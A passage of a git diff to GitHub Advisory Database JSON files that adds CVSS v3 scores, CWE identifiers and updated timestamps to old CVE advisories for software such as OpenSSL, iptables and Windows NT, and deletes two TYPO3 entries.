"https://lists.apache.org/thread.html/rd65d8ba68ba17e7deedafbf5bb4899f2ae4dad781d21b931c2941ac3%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd65d8ba68ba17e7deedafbf5bb4899f2ae4dad781d21b931c2941ac3@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/re895fc1736d25c8cf57e102c871613b8aeec9ea26fd8a44e7942b5ab%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re895fc1736d25c8cf57e102c871613b8aeec9ea26fd8a44e7942b5ab@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/rf2f0f3611f937cf6cfb3b4fe4a67f69885855126110e1e3f2fb2728e%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf2f0f3611f937cf6cfb3b4fe4a67f69885855126110e1e3f2fb2728e@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/rf6449464fd8b7437704c55f88361b66f12d5b5f90bcce66af4be4ba9%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf6449464fd8b7437704c55f88361b66f12d5b5f90bcce66af4be4ba9@%3Ccvs.httpd.apache.org%3E" @@ -105,7 +136,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-131" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-f2v4-c8r6-vfvj/GHSA-f2v4-c8r6-vfvj.json b/advisories/unreviewed/2022/04/GHSA-f2v4-c8r6-vfvj/GHSA-f2v4-c8r6-vfvj.json index a8d19d654a493..e878c3c30d1ca 100644 --- a/advisories/unreviewed/2022/04/GHSA-f2v4-c8r6-vfvj/GHSA-f2v4-c8r6-vfvj.json +++ b/advisories/unreviewed/2022/04/GHSA-f2v4-c8r6-vfvj/GHSA-f2v4-c8r6-vfvj.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-f2v4-c8r6-vfvj", - "modified": "2022-04-30T18:19:42Z", + "modified": "2024-02-03T03:30:26Z", "published": "2022-04-30T18:19:42Z", "aliases": [ "CVE-2002-0671" ], "details": "Pingtel xpressa SIP-based voice-over-IP phone 1.2.5 through 1.2.7.4 downloads phone applications from a web site but can not verify the integrity of the applications, which could allow remote attackers to install Trojan horse applications via DNS spoofing.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -37,7 +40,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-494" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-fc65-58v2-9r8h/GHSA-fc65-58v2-9r8h.json b/advisories/unreviewed/2022/04/GHSA-fc65-58v2-9r8h/GHSA-fc65-58v2-9r8h.json index 98e941f21eb03..6ddde16fb7994 100644 --- a/advisories/unreviewed/2022/04/GHSA-fc65-58v2-9r8h/GHSA-fc65-58v2-9r8h.json +++ b/advisories/unreviewed/2022/04/GHSA-fc65-58v2-9r8h/GHSA-fc65-58v2-9r8h.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-fc65-58v2-9r8h", - "modified": "2022-04-30T18:21:16Z", + "modified": "2024-02-08T21:30:30Z", "published": "2022-04-30T18:21:16Z", "aliases": [ "CVE-2002-1484" ], "details": "DB4Web server, when configured to use verbose debug messages, allows remote attackers to use DB4Web as a proxy and attempt TCP connections to other systems (port scan) via a request for a URL that specifies the target IP address and port, which produces a connection status in the resulting error message.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -37,7 +40,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-918" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-ffwc-j4xg-37cv/GHSA-ffwc-j4xg-37cv.json b/advisories/unreviewed/2022/04/GHSA-ffwc-j4xg-37cv/GHSA-ffwc-j4xg-37cv.json index 906213a798310..846d6a0281497 100644 --- a/advisories/unreviewed/2022/04/GHSA-ffwc-j4xg-37cv/GHSA-ffwc-j4xg-37cv.json +++ b/advisories/unreviewed/2022/04/GHSA-ffwc-j4xg-37cv/GHSA-ffwc-j4xg-37cv.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-ffwc-j4xg-37cv", - "modified": "2022-04-30T18:17:14Z", + "modified": "2024-02-02T03:30:28Z", "published": "2022-04-30T18:17:14Z", "aliases": [ "CVE-2001-1042" ], "details": "Transsoft Broker 5.9.5.0 allows remote attackers to read arbitrary files and directories by uploading a .lnk (link) file that points to the target file.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -33,7 +36,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-59" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-fgj9-8c8v-jfwq/GHSA-fgj9-8c8v-jfwq.json b/advisories/unreviewed/2022/04/GHSA-fgj9-8c8v-jfwq/GHSA-fgj9-8c8v-jfwq.json index f58fe62632190..75ead47302e4a 100644 --- a/advisories/unreviewed/2022/04/GHSA-fgj9-8c8v-jfwq/GHSA-fgj9-8c8v-jfwq.json +++ b/advisories/unreviewed/2022/04/GHSA-fgj9-8c8v-jfwq/GHSA-fgj9-8c8v-jfwq.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-fgj9-8c8v-jfwq", - "modified": "2022-04-30T18:18:26Z", + "modified": "2024-02-08T21:30:29Z", "published": "2022-04-30T18:18:26Z", "aliases": [ "CVE-2002-0051" ], "details": "Windows 2000 allows local users to prevent the application of new group policy settings by opening Group Policy files with exclusive-read access.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -37,7 +40,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-667" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-fjc3-77q6-8ffr/GHSA-fjc3-77q6-8ffr.json b/advisories/unreviewed/2022/04/GHSA-fjc3-77q6-8ffr/GHSA-fjc3-77q6-8ffr.json index 23d06eab2035a..8e870b4a92378 100644 --- a/advisories/unreviewed/2022/04/GHSA-fjc3-77q6-8ffr/GHSA-fjc3-77q6-8ffr.json +++ b/advisories/unreviewed/2022/04/GHSA-fjc3-77q6-8ffr/GHSA-fjc3-77q6-8ffr.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-fjc3-77q6-8ffr", - "modified": "2022-04-30T18:19:55Z", + "modified": "2024-02-08T21:30:29Z", "published": "2022-04-30T18:19:55Z", "aliases": [ "CVE-2002-0788" ], "details": "An interaction between PGP 7.0.3 with the \"wipe deleted files\" option, when used on Windows Encrypted File System (EFS), creates a cleartext temporary files that cannot be wiped or deleted due to strong permissions, which could allow certain local users or attackers with physical access to obtain cleartext information.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -41,7 +44,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-459" ], "severity": "LOW", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-fjjp-8g8w-55f2/GHSA-fjjp-8g8w-55f2.json b/advisories/unreviewed/2022/04/GHSA-fjjp-8g8w-55f2/GHSA-fjjp-8g8w-55f2.json index d3854cdf18022..59d3ffaac4006 100644 --- a/advisories/unreviewed/2022/04/GHSA-fjjp-8g8w-55f2/GHSA-fjjp-8g8w-55f2.json +++ b/advisories/unreviewed/2022/04/GHSA-fjjp-8g8w-55f2/GHSA-fjjp-8g8w-55f2.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-fjjp-8g8w-55f2", - "modified": "2022-04-30T18:11:52Z", + "modified": "2024-02-08T21:30:28Z", "published": "2022-04-30T18:11:52Z", "aliases": [ "CVE-1999-1127" ], "details": "Windows NT 4.0 does not properly shut down invalid named pipe RPC connections, which allows remote attackers to cause a denial of service (resource exhaustion) via a series of connections containing malformed data, aka the \"Named Pipes Over RPC\" vulnerability.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -33,7 +36,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-772" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-g36g-xcjc-mwvj/GHSA-g36g-xcjc-mwvj.json b/advisories/unreviewed/2022/04/GHSA-g36g-xcjc-mwvj/GHSA-g36g-xcjc-mwvj.json index 416d871ecbaab..4a6816dd12d36 100644 --- a/advisories/unreviewed/2022/04/GHSA-g36g-xcjc-mwvj/GHSA-g36g-xcjc-mwvj.json +++ b/advisories/unreviewed/2022/04/GHSA-g36g-xcjc-mwvj/GHSA-g36g-xcjc-mwvj.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-g36g-xcjc-mwvj", - "modified": "2022-04-29T02:58:25Z", + "modified": "2024-02-08T15:30:25Z", "published": "2022-04-29T02:58:25Z", "aliases": [ "CVE-2004-0816" ], "details": "Integer underflow in the firewall logging rules for iptables in Linux before 2.6.8 allows remote attackers to cause a denial of service (application crash) via a malformed IP packet.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -41,7 +44,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-191" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-gqmh-5xmq-3fhg/GHSA-gqmh-5xmq-3fhg.json b/advisories/unreviewed/2022/04/GHSA-gqmh-5xmq-3fhg/GHSA-gqmh-5xmq-3fhg.json deleted file mode 100644 index 297cbe8684ada..0000000000000 --- a/advisories/unreviewed/2022/04/GHSA-gqmh-5xmq-3fhg/GHSA-gqmh-5xmq-3fhg.json +++ /dev/null @@ -1,43 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-gqmh-5xmq-3fhg", - "modified": "2022-04-21T01:57:47Z", - "published": "2022-04-21T01:57:47Z", - "aliases": [ - "CVE-2010-3671" - ], - "details": "TYPO3 before 4.1.14, 4.2.x before 4.2.13, 4.3.x before 4.3.4 and 4.4.x before 4.4.1 is open to a session fixation attack which allows remote attackers to hijack a victim's session.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3671" - }, - { - "type": "WEB", - "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=590719" - }, - { - "type": "WEB", - "url": "https://security-tracker.debian.org/tracker/CVE-2010-3671" - }, - { - "type": "WEB", - "url": "https://typo3.org/security/advisory/typo3-sa-2010-012/#Broken_Authentication_and_Session_Management" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-11-05T20:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/04/GHSA-grc6-2v8g-8xww/GHSA-grc6-2v8g-8xww.json b/advisories/unreviewed/2022/04/GHSA-grc6-2v8g-8xww/GHSA-grc6-2v8g-8xww.json index 9fab4c5663c3d..3e11b6c8bb3a8 100644 --- a/advisories/unreviewed/2022/04/GHSA-grc6-2v8g-8xww/GHSA-grc6-2v8g-8xww.json +++ b/advisories/unreviewed/2022/04/GHSA-grc6-2v8g-8xww/GHSA-grc6-2v8g-8xww.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-grc6-2v8g-8xww", - "modified": "2022-04-29T03:00:03Z", + "modified": "2024-02-08T21:30:30Z", "published": "2022-04-29T03:00:03Z", "aliases": [ "CVE-2004-1703" ], "details": "Fusion News 3.6.1 allows remote attackers to add user accounts, if the administrator is logged in, via a comment that contains an img bbcode tag that calls index.php with the signup action, which is executed when the administrator's browser loads the page with the img tag.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -37,7 +40,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-352" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-h2cc-464x-vqhj/GHSA-h2cc-464x-vqhj.json b/advisories/unreviewed/2022/04/GHSA-h2cc-464x-vqhj/GHSA-h2cc-464x-vqhj.json index e0e3ca26f16b7..5490934091533 100644 --- a/advisories/unreviewed/2022/04/GHSA-h2cc-464x-vqhj/GHSA-h2cc-464x-vqhj.json +++ b/advisories/unreviewed/2022/04/GHSA-h2cc-464x-vqhj/GHSA-h2cc-464x-vqhj.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-h2cc-464x-vqhj", - "modified": "2022-04-30T18:21:42Z", + "modified": "2024-02-08T18:30:37Z", "published": "2022-04-30T18:21:42Z", "aliases": [ "CVE-2002-1713" ], "details": "The Standard security setting for Mandrake-Security package (msec) in Mandrake 8.2 installs home directories with world-readable permissions, which could allow local users to read other user's files.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -37,7 +40,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-276" ], "severity": "LOW", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-h6vw-m287-cx84/GHSA-h6vw-m287-cx84.json b/advisories/unreviewed/2022/04/GHSA-h6vw-m287-cx84/GHSA-h6vw-m287-cx84.json index 0d3d4216adf61..865c94dbdfe0f 100644 --- a/advisories/unreviewed/2022/04/GHSA-h6vw-m287-cx84/GHSA-h6vw-m287-cx84.json +++ b/advisories/unreviewed/2022/04/GHSA-h6vw-m287-cx84/GHSA-h6vw-m287-cx84.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-h6vw-m287-cx84", - "modified": "2022-04-30T18:18:05Z", + "modified": "2024-02-08T21:30:28Z", "published": "2022-04-30T18:18:05Z", "aliases": [ "CVE-2001-1452" ], "details": "By default, DNS servers on Windows NT 4.0 and Windows 2000 Server cache glue records received from non-delegated name servers, which allows remote attackers to poison the DNS cache via spoofed DNS responses.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } ], "affected": [ @@ -22,6 +25,10 @@ "type": "WEB", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/3675" }, + { + "type": "WEB", + "url": "http://support.microsoft.com/default.aspx?scid=KB%3Ben-us%3Bq241352" + }, { "type": "WEB", "url": "http://support.microsoft.com/default.aspx?scid=KB;en-us;q241352" @@ -37,7 +44,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-346" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-h92h-m4pr-cxfx/GHSA-h92h-m4pr-cxfx.json b/advisories/unreviewed/2022/04/GHSA-h92h-m4pr-cxfx/GHSA-h92h-m4pr-cxfx.json index 90216cc17ce81..b6cd20d4d412d 100644 --- a/advisories/unreviewed/2022/04/GHSA-h92h-m4pr-cxfx/GHSA-h92h-m4pr-cxfx.json +++ b/advisories/unreviewed/2022/04/GHSA-h92h-m4pr-cxfx/GHSA-h92h-m4pr-cxfx.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-h92h-m4pr-cxfx", - "modified": "2022-04-30T18:17:56Z", + "modified": "2024-02-02T03:30:28Z", "published": "2022-04-30T18:17:56Z", "aliases": [ "CVE-2001-1386" ], "details": "WFTPD 3.00 allows remote attackers to read arbitrary files by uploading a (link) file that ends in a \".lnk.\" extension, which bypasses WFTPD's check for a \".lnk\" extension.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -33,7 +36,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-59" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-hg32-p8hw-8g3x/GHSA-hg32-p8hw-8g3x.json b/advisories/unreviewed/2022/04/GHSA-hg32-p8hw-8g3x/GHSA-hg32-p8hw-8g3x.json index a97e023b3f2a3..8d1cdccbad8e7 100644 --- a/advisories/unreviewed/2022/04/GHSA-hg32-p8hw-8g3x/GHSA-hg32-p8hw-8g3x.json +++ b/advisories/unreviewed/2022/04/GHSA-hg32-p8hw-8g3x/GHSA-hg32-p8hw-8g3x.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-hg32-p8hw-8g3x", - "modified": "2022-04-29T02:57:28Z", + "modified": "2024-02-08T03:32:43Z", "published": "2022-04-29T02:57:28Z", "aliases": [ "CVE-2004-0285" ], "details": "PHP remote file inclusion vulnerabilities in include/footer.inc.php in (1) AllMyVisitors, (2) AllMyLinks, and (3) AllMyGuests allow remote attackers to execute arbitrary PHP code via a URL in the _AMVconfig[cfg_serverpath] parameter.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -53,6 +56,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-829", "CWE-94" ], "severity": "HIGH", diff --git a/advisories/unreviewed/2022/04/GHSA-hmpx-mhc7-wxwr/GHSA-hmpx-mhc7-wxwr.json b/advisories/unreviewed/2022/04/GHSA-hmpx-mhc7-wxwr/GHSA-hmpx-mhc7-wxwr.json index 769b90713703e..4cd998f2cc6d3 100644 --- a/advisories/unreviewed/2022/04/GHSA-hmpx-mhc7-wxwr/GHSA-hmpx-mhc7-wxwr.json +++ b/advisories/unreviewed/2022/04/GHSA-hmpx-mhc7-wxwr/GHSA-hmpx-mhc7-wxwr.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-hmpx-mhc7-wxwr", - "modified": "2022-04-30T18:21:00Z", + "modified": "2024-02-02T03:30:30Z", "published": "2022-04-30T18:21:00Z", "aliases": [ "CVE-2002-1347" ], "details": "Multiple buffer overflows in Cyrus SASL library 2.1.9 and earlier allow remote attackers to cause a denial of service and possibly execute arbitrary code via (1) long inputs during user name canonicalization, (2) characters that need to be escaped during LDAP authentication using saslauthd, or (3) an off-by-one error in the log writer, which does not allocate space for the null character that terminates a string.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -73,7 +76,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-131" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-hq7h-vj5v-frp8/GHSA-hq7h-vj5v-frp8.json b/advisories/unreviewed/2022/04/GHSA-hq7h-vj5v-frp8/GHSA-hq7h-vj5v-frp8.json index b6d2016632497..dc95d5f40f462 100644 --- a/advisories/unreviewed/2022/04/GHSA-hq7h-vj5v-frp8/GHSA-hq7h-vj5v-frp8.json +++ b/advisories/unreviewed/2022/04/GHSA-hq7h-vj5v-frp8/GHSA-hq7h-vj5v-frp8.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-hq7h-vj5v-frp8", - "modified": "2022-04-30T18:22:26Z", + "modified": "2024-02-08T21:30:30Z", "published": "2022-04-30T18:22:26Z", "aliases": [ "CVE-2002-2067" ], "details": "East-Tec Eraser 2002 does not clear Windows alternate data streams that are attached to files on NTFS file systems, which allows attackers to recover sensitive information that was supposed to be deleted.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -45,7 +48,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-459" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-j628-384g-rmgc/GHSA-j628-384g-rmgc.json b/advisories/unreviewed/2022/04/GHSA-j628-384g-rmgc/GHSA-j628-384g-rmgc.json deleted file mode 100644 index 8723da485937c..0000000000000 --- a/advisories/unreviewed/2022/04/GHSA-j628-384g-rmgc/GHSA-j628-384g-rmgc.json +++ /dev/null @@ -1,43 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-j628-384g-rmgc", - "modified": "2022-04-21T01:57:46Z", - "published": "2022-04-21T01:57:46Z", - "aliases": [ - "CVE-2010-3661" - ], - "details": "TYPO3 before 4.1.14, 4.2.x before 4.2.13, 4.3.x before 4.3.4 and 4.4.x before 4.4.1 allows Open Redirection on the backend.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3661" - }, - { - "type": "WEB", - "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=590719" - }, - { - "type": "WEB", - "url": "https://security-tracker.debian.org/tracker/CVE-2010-3661" - }, - { - "type": "WEB", - "url": "https://typo3.org/security/advisory/typo3-sa-2010-012/#Open_Redirection" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-11-01T18:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/04/GHSA-jj45-jp8r-qcjx/GHSA-jj45-jp8r-qcjx.json b/advisories/unreviewed/2022/04/GHSA-jj45-jp8r-qcjx/GHSA-jj45-jp8r-qcjx.json index 8f3cf4e9942b1..ef0163fab26f9 100644 --- a/advisories/unreviewed/2022/04/GHSA-jj45-jp8r-qcjx/GHSA-jj45-jp8r-qcjx.json +++ b/advisories/unreviewed/2022/04/GHSA-jj45-jp8r-qcjx/GHSA-jj45-jp8r-qcjx.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-jj45-jp8r-qcjx", - "modified": "2022-04-30T18:19:45Z", + "modified": "2024-02-03T03:30:26Z", "published": "2022-04-30T18:19:45Z", "aliases": [ "CVE-2002-0704" ], "details": "The Network Address Translation (NAT) capability for Netfilter (\"iptables\") 1.2.6a and earlier leaks translated IP addresses in ICMP error messages.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -45,7 +48,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-212" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-jpc9-rmm6-c6xg/GHSA-jpc9-rmm6-c6xg.json b/advisories/unreviewed/2022/04/GHSA-jpc9-rmm6-c6xg/GHSA-jpc9-rmm6-c6xg.json index ab0389e08a240..5b123961dd770 100644 --- a/advisories/unreviewed/2022/04/GHSA-jpc9-rmm6-c6xg/GHSA-jpc9-rmm6-c6xg.json +++ b/advisories/unreviewed/2022/04/GHSA-jpc9-rmm6-c6xg/GHSA-jpc9-rmm6-c6xg.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-jpc9-rmm6-c6xg", - "modified": "2022-04-29T03:00:43Z", + "modified": "2024-02-08T21:30:30Z", "published": "2022-04-29T03:00:43Z", "aliases": [ "CVE-2004-2061" ], "details": "RiSearch 1.0.01 and RiSearch Pro 3.2.06 allows remote attackers to use the show.pl script as an open proxy, or read arbitrary local files, by setting the url parameter to a (1) http://, (2) ftp://, or (3) file:// URL.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -49,7 +52,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-918" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-m8cx-f5qj-q68r/GHSA-m8cx-f5qj-q68r.json b/advisories/unreviewed/2022/04/GHSA-m8cx-f5qj-q68r/GHSA-m8cx-f5qj-q68r.json index b418df2ee7cb1..2b11f1916aae8 100644 --- a/advisories/unreviewed/2022/04/GHSA-m8cx-f5qj-q68r/GHSA-m8cx-f5qj-q68r.json +++ b/advisories/unreviewed/2022/04/GHSA-m8cx-f5qj-q68r/GHSA-m8cx-f5qj-q68r.json @@ -28,7 +28,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-266" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-m95f-rwpm-5j9f/GHSA-m95f-rwpm-5j9f.json b/advisories/unreviewed/2022/04/GHSA-m95f-rwpm-5j9f/GHSA-m95f-rwpm-5j9f.json index 9be9790ead606..505b9d0fd2a16 100644 --- a/advisories/unreviewed/2022/04/GHSA-m95f-rwpm-5j9f/GHSA-m95f-rwpm-5j9f.json +++ b/advisories/unreviewed/2022/04/GHSA-m95f-rwpm-5j9f/GHSA-m95f-rwpm-5j9f.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-m95f-rwpm-5j9f", - "modified": "2022-04-30T18:15:06Z", + "modified": "2024-02-08T21:30:28Z", "published": "2022-04-30T18:15:06Z", "aliases": [ "CVE-2000-1198" ], "details": "qpopper POP server creates lock files with predictable names, which allows local users to cause a denial of service for other users (lack of mail access) by creating lock files for other mail boxes.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -33,7 +36,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-667" ], "severity": "LOW", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-mmjc-3g2p-897m/GHSA-mmjc-3g2p-897m.json b/advisories/unreviewed/2022/04/GHSA-mmjc-3g2p-897m/GHSA-mmjc-3g2p-897m.json index 216ebfe8a7949..be98324e3dd07 100644 --- a/advisories/unreviewed/2022/04/GHSA-mmjc-3g2p-897m/GHSA-mmjc-3g2p-897m.json +++ b/advisories/unreviewed/2022/04/GHSA-mmjc-3g2p-897m/GHSA-mmjc-3g2p-897m.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-mmjc-3g2p-897m", - "modified": "2022-04-29T01:26:36Z", + "modified": "2024-02-02T15:30:25Z", "published": "2022-04-29T01:26:36Z", "aliases": [ "CVE-2003-0545" ], "details": "Double free vulnerability in OpenSSL 0.9.7 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via an SSL client certificate with a certain invalid ASN.1 encoding.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -61,7 +64,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-415" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-mp9h-8rrx-27f5/GHSA-mp9h-8rrx-27f5.json b/advisories/unreviewed/2022/04/GHSA-mp9h-8rrx-27f5/GHSA-mp9h-8rrx-27f5.json index b2475d03eeeb1..87712901d0f7f 100644 --- a/advisories/unreviewed/2022/04/GHSA-mp9h-8rrx-27f5/GHSA-mp9h-8rrx-27f5.json +++ b/advisories/unreviewed/2022/04/GHSA-mp9h-8rrx-27f5/GHSA-mp9h-8rrx-27f5.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-mp9h-8rrx-27f5", - "modified": "2022-04-30T18:22:32Z", + "modified": "2024-02-08T03:32:43Z", "published": "2022-04-30T18:22:32Z", "aliases": [ "CVE-2002-2119" ], "details": "Novell eDirectory 8.6.2 and 8.7 use case insensitive passwords, which makes it easier for remote attackers to conduct brute force password guessing.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -33,7 +36,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-178" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-mw47-2hrx-68vv/GHSA-mw47-2hrx-68vv.json b/advisories/unreviewed/2022/04/GHSA-mw47-2hrx-68vv/GHSA-mw47-2hrx-68vv.json index bd5e7f1fa8410..f626def3ccdbc 100644 --- a/advisories/unreviewed/2022/04/GHSA-mw47-2hrx-68vv/GHSA-mw47-2hrx-68vv.json +++ b/advisories/unreviewed/2022/04/GHSA-mw47-2hrx-68vv/GHSA-mw47-2hrx-68vv.json @@ -37,7 +37,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-78" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-mx9g-mg46-cf6g/GHSA-mx9g-mg46-cf6g.json 